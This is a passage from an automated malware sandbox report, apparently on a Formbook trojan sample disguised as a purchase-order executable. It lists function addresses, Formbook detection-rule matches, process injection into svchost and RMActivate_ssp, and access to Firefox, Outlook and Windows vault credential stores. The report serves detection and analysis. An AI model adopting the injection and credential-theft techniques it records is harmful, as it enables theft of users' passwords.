            Source: C:\Windows\SysWOW64\RMActivate_ssp.exeCode function: 5_2_02F020005_2_02F02000
            Source: C:\Windows\SysWOW64\RMActivate_ssp.exeCode function: 5_2_02F281CC5_2_02F281CC
            Source: C:\Windows\SysWOW64\RMActivate_ssp.exeCode function: 5_2_02F241A25_2_02F241A2
            Source: C:\Windows\SysWOW64\RMActivate_ssp.exeCode function: 5_2_02F301AA5_2_02F301AA
            Source: C:\Windows\SysWOW64\RMActivate_ssp.exeCode function: 5_2_02EF81585_2_02EF8158
            Source: C:\Windows\SysWOW64\RMActivate_ssp.exeCode function: 5_2_02E601005_2_02E60100
            Source: C:\Windows\SysWOW64\RMActivate_ssp.exeCode function: 5_2_02F0A1185_2_02F0A118
            Source: C:\Windows\SysWOW64\RMActivate_ssp.exeCode function: 5_2_02E8C6E05_2_02E8C6E0
            Source: C:\Windows\SysWOW64\RMActivate_ssp.exeCode function: 5_2_02E6C7C05_2_02E6C7C0
            Source: C:\Windows\SysWOW64\RMActivate_ssp.exeCode function: 5_2_02E707705_2_02E70770
            Source: C:\Windows\SysWOW64\RMActivate_ssp.exeCode function: 5_2_02E947505_2_02E94750
            Source: C:\Windows\SysWOW64\RMActivate_ssp.exeCode function: 5_2_02F1E4F65_2_02F1E4F6
            Source: C:\Windows\SysWOW64\RMActivate_ssp.exeCode function: 5_2_02F224465_2_02F22446
            Source: C:\Windows\SysWOW64\RMActivate_ssp.exeCode function: 5_2_02F144205_2_02F14420
            Source: C:\Windows\SysWOW64\RMActivate_ssp.exeCode function: 5_2_02F305915_2_02F30591
            Source: C:\Windows\SysWOW64\RMActivate_ssp.exeCode function: 5_2_02E705355_2_02E70535
            Source: C:\Windows\SysWOW64\RMActivate_ssp.exeCode function: 5_2_02E6EA805_2_02E6EA80
            Source: C:\Windows\SysWOW64\RMActivate_ssp.exeCode function: 5_2_02F26BD75_2_02F26BD7
            Source: C:\Windows\SysWOW64\RMActivate_ssp.exeCode function: 5_2_02F2AB405_2_02F2AB40
            Source: C:\Windows\SysWOW64\RMActivate_ssp.exeCode function: 5_2_02E9E8F05_2_02E9E8F0
            Source: C:\Windows\SysWOW64\RMActivate_ssp.exeCode function: 5_2_02E568B85_2_02E568B8
            Source: C:\Windows\SysWOW64\RMActivate_ssp.exeCode function: 5_2_02E728405_2_02E72840
            Source: C:\Windows\SysWOW64\RMActivate_ssp.exeCode function: 5_2_02E7A8405_2_02E7A840
            Source: C:\Windows\SysWOW64\RMActivate_ssp.exeCode function: 5_2_02E729A05_2_02E729A0
            Source: C:\Windows\SysWOW64\RMActivate_ssp.exeCode function: 5_2_02F3A9A65_2_02F3A9A6
            Source: C:\Windows\SysWOW64\RMActivate_ssp.exeCode function: 5_2_02E869625_2_02E86962
            Source: C:\Windows\SysWOW64\RMActivate_ssp.exeCode function: 5_2_02F2EEDB5_2_02F2EEDB
            Source: C:\Windows\SysWOW64\RMActivate_ssp.exeCode function: 5_2_02F2CE935_2_02F2CE93
            Source: C:\Windows\SysWOW64\RMActivate_ssp.exeCode function: 5_2_02E82E905_2_02E82E90
            Source: C:\Windows\SysWOW64\RMActivate_ssp.exeCode function: 5_2_02E70E595_2_02E70E59
            Source: C:\Windows\SysWOW64\RMActivate_ssp.exeCode function: 5_2_02F2EE265_2_02F2EE26
            Source: C:\Windows\SysWOW64\RMActivate_ssp.exeCode function: 5_2_02E7CFE05_2_02E7CFE0
            Source: C:\Windows\SysWOW64\RMActivate_ssp.exeCode function: 5_2_02E62FC85_2_02E62FC8
            Source: C:\Windows\SysWOW64\RMActivate_ssp.exeCode function: 5_2_02EEEFA05_2_02EEEFA0
            Source: C:\Windows\SysWOW64\RMActivate_ssp.exeCode function: 5_2_02EE4F405_2_02EE4F40
            Source: C:\Windows\SysWOW64\RMActivate_ssp.exeCode function: 5_2_02F12F305_2_02F12F30
            Source: C:\Windows\SysWOW64\RMActivate_ssp.exeCode function: 5_2_02EB2F285_2_02EB2F28
            Source: C:\Windows\SysWOW64\RMActivate_ssp.exeCode function: 5_2_02E90F305_2_02E90F30
            Source: C:\Windows\SysWOW64\RMActivate_ssp.exeCode function: 5_2_02E60CF25_2_02E60CF2
            Source: C:\Windows\SysWOW64\RMActivate_ssp.exeCode function: 5_2_02F10CB55_2_02F10CB5
            Source: C:\Windows\SysWOW64\RMActivate_ssp.exeCode function: 5_2_02E70C005_2_02E70C00
            Source: C:\Windows\SysWOW64\RMActivate_ssp.exeCode function: 5_2_02E6ADE05_2_02E6ADE0
            Source: C:\Windows\SysWOW64\RMActivate_ssp.exeCode function: 5_2_02E88DBF5_2_02E88DBF
            Source: C:\Windows\SysWOW64\RMActivate_ssp.exeCode function: 5_2_02E7AD005_2_02E7AD00
            Source: C:\Windows\SysWOW64\RMActivate_ssp.exeCode function: 5_2_02F0CD1F5_2_02F0CD1F
            Source: C:\Windows\SysWOW64\RMActivate_ssp.exeCode function: 5_2_02F112ED5_2_02F112ED
            Source: C:\Windows\SysWOW64\RMActivate_ssp.exeCode function: 5_2_02E8B2C05_2_02E8B2C0
            Source: C:\Windows\SysWOW64\RMActivate_ssp.exeCode function: 5_2_02E752A05_2_02E752A0
            Source: C:\Windows\SysWOW64\RMActivate_ssp.exeCode function: 5_2_02EB739A5_2_02EB739A
            Source: C:\Windows\SysWOW64\RMActivate_ssp.exeCode function: 5_2_02E5D34C5_2_02E5D34C
            Source: C:\Windows\SysWOW64\RMActivate_ssp.exeCode function: 5_2_02F2132D5_2_02F2132D
            Source: C:\Windows\SysWOW64\RMActivate_ssp.exeCode function: 5_2_02F2F0E05_2_02F2F0E0
            Source: C:\Windows\SysWOW64\RMActivate_ssp.exeCode function: 5_2_02F270E95_2_02F270E9
            Source: C:\Windows\SysWOW64\RMActivate_ssp.exeCode function: 5_2_02E770C05_2_02E770C0
            Source: C:\Windows\SysWOW64\RMActivate_ssp.exeCode function: 5_2_02F1F0CC5_2_02F1F0CC
            Source: C:\Windows\SysWOW64\RMActivate_ssp.exeCode function: 5_2_02E7B1B05_2_02E7B1B0
            Source: C:\Windows\SysWOW64\RMActivate_ssp.exeCode function: 5_2_02EA516C5_2_02EA516C
            Source: C:\Windows\SysWOW64\RMActivate_ssp.exeCode function: 5_2_02E5F1725_2_02E5F172
            Source: C:\Windows\SysWOW64\RMActivate_ssp.exeCode function: 5_2_02F3B16B5_2_02F3B16B
            Source: C:\Windows\SysWOW64\RMActivate_ssp.exeCode function: 5_2_02F216CC5_2_02F216CC
            Source: C:\Windows\SysWOW64\RMActivate_ssp.exeCode function: 5_2_02F2F7B05_2_02F2F7B0
            Source: C:\Windows\SysWOW64\RMActivate_ssp.exeCode function: 5_2_02E614605_2_02E61460
            Source: C:\Windows\SysWOW64\RMActivate_ssp.exeCode function: 5_2_02F2F43F5_2_02F2F43F
            Source: C:\Windows\SysWOW64\RMActivate_ssp.exeCode function: 5_2_02F0D5B05_2_02F0D5B0
            Source: C:\Windows\SysWOW64\RMActivate_ssp.exeCode function: 5_2_02F275715_2_02F27571
            Source: C:\Windows\SysWOW64\RMActivate_ssp.exeCode function: 5_2_02F1DAC65_2_02F1DAC6
            Source: C:\Windows\SysWOW64\RMActivate_ssp.exeCode function: 5_2_02EB5AA05_2_02EB5AA0
            Source: C:\Windows\SysWOW64\RMActivate_ssp.exeCode function: 5_2_02F11AA35_2_02F11AA3
            Source: C:\Windows\SysWOW64\RMActivate_ssp.exeCode function: 5_2_02F0DAAC5_2_02F0DAAC
            Source: C:\Windows\SysWOW64\RMActivate_ssp.exeCode function: 5_2_02EE3A6C5_2_02EE3A6C
            Source: C:\Windows\SysWOW64\RMActivate_ssp.exeCode function: 5_2_02F27A465_2_02F27A46
            Source: C:\Windows\SysWOW64\RMActivate_ssp.exeCode function: 5_2_02F2FA495_2_02F2FA49
            Source: C:\Windows\SysWOW64\RMActivate_ssp.exeCode function: 5_2_02EADBF95_2_02EADBF9
            Source: C:\Windows\SysWOW64\RMActivate_ssp.exeCode function: 5_2_02EE5BF05_2_02EE5BF0
            Source: C:\Windows\SysWOW64\RMActivate_ssp.exeCode function: 5_2_02E8FB805_2_02E8FB80
            Source: C:\Windows\SysWOW64\RMActivate_ssp.exeCode function: 5_2_02F2FB765_2_02F2FB76
            Source: C:\Windows\SysWOW64\RMActivate_ssp.exeCode function: 5_2_02E738E05_2_02E738E0
            Source: C:\Windows\SysWOW64\RMActivate_ssp.exeCode function: 5_2_02EDD8005_2_02EDD800
            Source: C:\Windows\SysWOW64\RMActivate_ssp.exeCode function: 5_2_02E799505_2_02E79950
            Source: C:\Windows\SysWOW64\RMActivate_ssp.exeCode function: 5_2_02E8B9505_2_02E8B950
            Source: C:\Windows\SysWOW64\RMActivate_ssp.exeCode function: 5_2_02F059105_2_02F05910
            Source: C:\Windows\SysWOW64\RMActivate_ssp.exeCode function: 5_2_02E79EB05_2_02E79EB0
            Source: C:\Windows\SysWOW64\RMActivate_ssp.exeCode function: 5_2_02F2FFB15_2_02F2FFB1
            Source: C:\Windows\SysWOW64\RMActivate_ssp.exeCode function: 5_2_02E71F925_2_02E71F92
            Source: C:\Windows\SysWOW64\RMActivate_ssp.exeCode function: 5_2_02F2FF095_2_02F2FF09
            Source: C:\Windows\SysWOW64\RMActivate_ssp.exeCode function: 5_2_02F2FCF25_2_02F2FCF2
            Source: C:\Windows\SysWOW64\RMActivate_ssp.exeCode function: 5_2_02EE9C325_2_02EE9C32
            Source: C:\Windows\SysWOW64\RMActivate_ssp.exeCode function: 5_2_02E8FDC05_2_02E8FDC0
            Source: C:\Windows\SysWOW64\RMActivate_ssp.exeCode function: 5_2_02F27D735_2_02F27D73
            Source: C:\Windows\SysWOW64\RMActivate_ssp.exeCode function: 5_2_02E73D405_2_02E73D40
            Source: C:\Windows\SysWOW64\RMActivate_ssp.exeCode function: 5_2_02F21D5A5_2_02F21D5A
            Source: C:\Windows\SysWOW64\RMActivate_ssp.exeCode function: 5_2_00351AB05_2_00351AB0
            Source: C:\Windows\SysWOW64\RMActivate_ssp.exeCode function: 5_2_0034CA305_2_0034CA30
            Source: C:\Windows\SysWOW64\RMActivate_ssp.exeCode function: 5_2_0034CA275_2_0034CA27
            Source: C:\Windows\SysWOW64\RMActivate_ssp.exeCode function: 5_2_0034CC505_2_0034CC50
            Source: C:\Windows\SysWOW64\RMActivate_ssp.exeCode function: 5_2_0034ACD05_2_0034ACD0
            Source: C:\Windows\SysWOW64\RMActivate_ssp.exeCode function: 5_2_003551705_2_00355170
            Source: C:\Windows\SysWOW64\RMActivate_ssp.exeCode function: 5_2_0035333B5_2_0035333B
            Source: C:\Windows\SysWOW64\RMActivate_ssp.exeCode function: 5_2_003533405_2_00353340
            Source: C:\Windows\SysWOW64\RMActivate_ssp.exeCode function: 5_2_0036B6C05_2_0036B6C0
            Source: C:\Windows\SysWOW64\RMActivate_ssp.exeCode function: 5_2_02BDE2D55_2_02BDE2D5
            Source: C:\Windows\SysWOW64\RMActivate_ssp.exeCode function: 5_2_02BDE3FB5_2_02BDE3FB
            Source: C:\Windows\SysWOW64\RMActivate_ssp.exeCode function: 5_2_02BDE78C5_2_02BDE78C
            Source: C:\Windows\SysWOW64\RMActivate_ssp.exeCode function: 5_2_02BDD7F85_2_02BDD7F8
            Source: C:\Users\user\Desktop\PO2-2401-0016 (TR).exeCode function: String function: 00170A30 appears 46 times
            Source: C:\Users\user\Desktop\PO2-2401-0016 (TR).exeCode function: String function: 0016F9F2 appears 40 times
            Source: C:\Users\user\Desktop\PO2-2401-0016 (TR).exeCode function: String function: 00159CB3 appears 31 times
            Source: C:\Windows\SysWOW64\svchost.exeCode function: String function: 0392B970 appears 280 times
            Source: C:\Windows\SysWOW64\svchost.exeCode function: String function: 03975130 appears 58 times
            Source: C:\Windows\SysWOW64\svchost.exeCode function: String function: 039AEA12 appears 86 times
            Source: C:\Windows\SysWOW64\svchost.exeCode function: String function: 039BF290 appears 105 times
            Source: C:\Windows\SysWOW64\svchost.exeCode function: String function: 03987E54 appears 111 times
            Source: C:\Windows\SysWOW64\RMActivate_ssp.exeCode function: String function: 02EB7E54 appears 102 times
            Source: C:\Windows\SysWOW64\RMActivate_ssp.exeCode function: String function: 02EEF290 appears 105 times
            Source: C:\Windows\SysWOW64\RMActivate_ssp.exeCode function: String function: 02EA5130 appears 58 times
            Source: C:\Windows\SysWOW64\RMActivate_ssp.exeCode function: String function: 02EDEA12 appears 86 times
            Source: C:\Windows\SysWOW64\RMActivate_ssp.exeCode function: String function: 02E5B970 appears 280 times
            Source: PO2-2401-0016 (TR).exe, 00000000.00000003.2059592529.00000000041C3000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs PO2-2401-0016 (TR).exe
            Source: PO2-2401-0016 (TR).exe, 00000000.00000003.2059736752.000000000436D000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs PO2-2401-0016 (TR).exe
            Source: PO2-2401-0016 (TR).exeStatic PE information: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
            Source: 2.2.svchost.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 2.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000005.00000002.4509591514.0000000002AD0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000002.00000002.2279303551.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000005.00000002.4509486697.0000000002A70000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000006.00000002.4511569074.0000000005360000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000002.00000002.2283186633.0000000005400000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000002.00000002.2280748926.0000000003C50000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000005.00000002.4508334396.0000000000340000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000003.00000002.4509574666.0000000004560000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@7/2@18/13
            Source: C:\Users\user\Desktop\PO2-2401-0016 (TR).exeCode function: 0_2_001C37B5 GetLastError,FormatMessageW,0_2_001C37B5
            Source: C:\Users\user\Desktop\PO2-2401-0016 (TR).exeCode function: 0_2_001B10BF AdjustTokenPrivileges,CloseHandle,0_2_001B10BF
            Source: C:\Users\user\Desktop\PO2-2401-0016 (TR).exeCode function: 0_2_001B16C3 LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,0_2_001B16C3
            Source: C:\Users\user\Desktop\PO2-2401-0016 (TR).exeCode function: 0_2_001C51CD SetErrorMode,GetDiskFreeSpaceExW,SetErrorMode,0_2_001C51CD
            Source: C:\Users\user\Desktop\PO2-2401-0016 (TR).exeCode function: 0_2_001DA67C CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,CloseHandle,0_2_001DA67C
            Source: C:\Users\user\Desktop\PO2-2401-0016 (TR).exeCode function: 0_2_001C648E _wcslen,CoInitialize,CoCreateInstance,CoUninitialize,0_2_001C648E
            Source: C:\Users\user\Desktop\PO2-2401-0016 (TR).exeCode function: 0_2_001542A2 CreateStreamOnHGlobal,FindResourceExW,LoadResource,SizeofResource,LockResource,0_2_001542A2
            Source: C:\Users\user\Desktop\PO2-2401-0016 (TR).exeFile created: C:\Users\user\AppData\Local\Temp\dewsJump to behavior
            Source: PO2-2401-0016 (TR).exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
            Source: C:\Program Files\Mozilla Firefox\firefox.exeFile read: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.iniJump to behavior
            Source: C:\Users\user\Desktop\PO2-2401-0016 (TR).exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
            Source: RMActivate_ssp.exe, 00000005.00000002.4508610835.0000000000710000.00000004.00000020.00020000.00000000.sdmp, RMActivate_ssp.exe, 00000005.00000003.2513035747.0000000000710000.00000004.00000020.00020000.00000000.sdmp, RMActivate_ssp.exe, 00000005.00000003.2512883594.00000000006EF000.00000004.00000020.00020000.00000000.sdmp, RMActivate_ssp.exe, 00000005.00000003.2519343965.000000000071A000.00000004.00000020.00020000.00000000.sdmp, RMActivate_ssp.exe, 00000005.00000002.4508610835.000000000073F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
            Source: PO2-2401-0016 (TR).exeVirustotal: Detection: 48%
            Source: PO2-2401-0016 (TR).exeReversingLabs: Detection: 50%
            Source: unknownProcess created: C:\Users\user\Desktop\PO2-2401-0016 (TR).exe "C:\Users\user\Desktop\PO2-2401-0016 (TR).exe"
            Source: C:\Users\user\Desktop\PO2-2401-0016 (TR).exeProcess created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\PO2-2401-0016 (TR).exe"
            Source: C:\Program Files (x86)\UitBsLBBtIhbRyKjvsYbYyvztghwWCAxcjOnCLIkfdStXzBftcpTNTYwbKrQbDaPonH\WwOlfblnYaWmLq.exeProcess created: C:\Windows\SysWOW64\RMActivate_ssp.exe "C:\Windows\SysWOW64\RMActivate_ssp.exe"
            Source: C:\Windows\SysWOW64\RMActivate_ssp.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"
            Source: C:\Users\user\Desktop\PO2-2401-0016 (TR).exeProcess created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\PO2-2401-0016 (TR).exe"Jump to behavior
            Source: C:\Program Files (x86)\UitBsLBBtIhbRyKjvsYbYyvztghwWCAxcjOnCLIkfdStXzBftcpTNTYwbKrQbDaPonH\WwOlfblnYaWmLq.exeProcess created: C:\Windows\SysWOW64\RMActivate_ssp.exe "C:\Windows\SysWOW64\RMActivate_ssp.exe"Jump to behavior
            Source: C:\Windows\SysWOW64\RMActivate_ssp.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"Jump to behavior
            Source: C:\Users\user\Desktop\PO2-2401-0016 (TR).exeSection loaded: wsock32.dllJump to behavior
            Source: C:\Users\user\Desktop\PO2-2401-0016 (TR).exeSection loaded: version.dllJump to behavior
            Source: C:\Users\user\Desktop\PO2-2401-0016 (TR).exeSection loaded: winmm.dllJump to behavior
            Source: C:\Users\user\Desktop\PO2-2401-0016 (TR).exeSection loaded: mpr.dllJump to behavior
            Source: C:\Users\user\Desktop\PO2-2401-0016 (TR).exeSection loaded: wininet.dllJump to behavior
            Source: C:\Users\user\Desktop\PO2-2401-0016 (TR).exeSection loaded: iphlpapi.dllJump to behavior
            Source: C:\Users\user\Desktop\PO2-2401-0016 (TR).exeSection loaded: userenv.dllJump to behavior
            Source: C:\Users\user\Desktop\PO2-2401-0016 (TR).exeSection loaded: uxtheme.dllJump to behavior
            Source: C:\Users\user\Desktop\PO2-2401-0016 (TR).exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Users\user\Desktop\PO2-2401-0016 (TR).exeSection loaded: windows.storage.dllJump to behavior
            Source: C:\Users\user\Desktop\PO2-2401-0016 (TR).exeSection loaded: wldp.dllJump to behavior
            Source: C:\Windows\SysWOW64\RMActivate_ssp.exeSection loaded: cryptsp.dllJump to behavior
            Source: C:\Windows\SysWOW64\RMActivate_ssp.exeSection loaded: wininet.dllJump to behavior
            Source: C:\Windows\SysWOW64\RMActivate_ssp.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Windows\SysWOW64\RMActivate_ssp.exeSection loaded: uxtheme.dllJump to behavior
            Source: C:\Windows\SysWOW64\RMActivate_ssp.exeSection loaded: ieframe.dllJump to behavior
            Source: C:\Windows\SysWOW64\RMActivate_ssp.exeSection loaded: iertutil.dllJump to behavior
            Source: C:\Windows\SysWOW64\RMActivate_ssp.exeSection loaded: netapi32.dllJump to behavior
            Source: C:\Windows\SysWOW64\RMActivate_ssp.exeSection loaded: version.dllJump to behavior
            Source: C:\Windows\SysWOW64\RMActivate_ssp.exeSection loaded: userenv.dllJump to behavior
            Source: C:\Windows\SysWOW64\RMActivate_ssp.exeSection loaded: winhttp.dllJump to behavior
            Source: C:\Windows\SysWOW64\RMActivate_ssp.exeSection loaded: wkscli.dllJump to behavior
            Source: C:\Windows\SysWOW64\RMActivate_ssp.exeSection loaded: netutils.dllJump to behavior
            Source: C:\Windows\SysWOW64\RMActivate_ssp.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Windows\SysWOW64\RMActivate_ssp.exeSection loaded: windows.storage.dllJump to behavior
            Source: C:\Windows\SysWOW64\RMActivate_ssp.exeSection loaded: wldp.dllJump to behavior
            Source: C:\Windows\SysWOW64\RMActivate_ssp.exeSection loaded: profapi.dllJump to behavior
            Source: C:\Windows\SysWOW64\RMActivate_ssp.exeSection loaded: secur32.dllJump to behavior
            Source: C:\Windows\SysWOW64\RMActivate_ssp.exeSection loaded: mlang.dllJump to behavior
            Source: C:\Windows\SysWOW64\RMActivate_ssp.exeSection loaded: propsys.dllJump to behavior
            Source: C:\Windows\SysWOW64\RMActivate_ssp.exeSection loaded: winsqlite3.dllJump to behavior
            Source: C:\Windows\SysWOW64\RMActivate_ssp.exeSection loaded: vaultcli.dllJump to behavior
            Source: C:\Windows\SysWOW64\RMActivate_ssp.exeSection loaded: wintypes.dllJump to behavior
            Source: C:\Windows\SysWOW64\RMActivate_ssp.exeSection loaded: dpapi.dllJump to behavior
            Source: C:\Windows\SysWOW64\RMActivate_ssp.exeSection loaded: cryptbase.dllJump to behavior
            Source: C:\Program Files (x86)\UitBsLBBtIhbRyKjvsYbYyvztghwWCAxcjOnCLIkfdStXzBftcpTNTYwbKrQbDaPonH\WwOlfblnYaWmLq.exeSection loaded: wininet.dllJump to behavior
            Source: C:\Program Files (x86)\UitBsLBBtIhbRyKjvsYbYyvztghwWCAxcjOnCLIkfdStXzBftcpTNTYwbKrQbDaPonH\WwOlfblnYaWmLq.exeSection loaded: mswsock.dllJump to behavior
            Source: C:\Program Files (x86)\UitBsLBBtIhbRyKjvsYbYyvztghwWCAxcjOnCLIkfdStXzBftcpTNTYwbKrQbDaPonH\WwOlfblnYaWmLq.exeSection loaded: dnsapi.dllJump to behavior
            Source: C:\Program Files (x86)\UitBsLBBtIhbRyKjvsYbYyvztghwWCAxcjOnCLIkfdStXzBftcpTNTYwbKrQbDaPonH\WwOlfblnYaWmLq.exeSection loaded: iphlpapi.dllJump to behavior
            Source: C:\Program Files (x86)\UitBsLBBtIhbRyKjvsYbYyvztghwWCAxcjOnCLIkfdStXzBftcpTNTYwbKrQbDaPonH\WwOlfblnYaWmLq.exeSection loaded: rasadhlp.dllJump to behavior
            Source: C:\Program Files (x86)\UitBsLBBtIhbRyKjvsYbYyvztghwWCAxcjOnCLIkfdStXzBftcpTNTYwbKrQbDaPonH\WwOlfblnYaWmLq.exeSection loaded: fwpuclnt.dllJump to behavior
            Source: C:\Windows\SysWOW64\RMActivate_ssp.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{3C374A40-BAE4-11CF-BF7D-00AA006946EE}\InProcServer32Jump to behavior
            Source: C:\Windows\SysWOW64\RMActivate_ssp.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\Jump to behavior
            Source: PO2-2401-0016 (TR).exeStatic file information: File size 1724416 > 1048576
            Source: PO2-2401-0016 (TR).exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
            Source: PO2-2401-0016 (TR).exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
            Source: PO2-2401-0016 (TR).exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
            Source: PO2-2401-0016 (TR).exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
            Source: PO2-2401-0016 (TR).exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
            Source: PO2-2401-0016 (TR).exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
            Source: PO2-2401-0016 (TR).exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
            Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: WwOlfblnYaWmLq.exe, 00000003.00000000.2201599538.00000000007AE000.00000002.00000001.01000000.00000004.sdmp, WwOlfblnYaWmLq.exe, 00000006.00000002.4508332207.00000000007AE000.00000002.00000001.01000000.00000004.sdmp
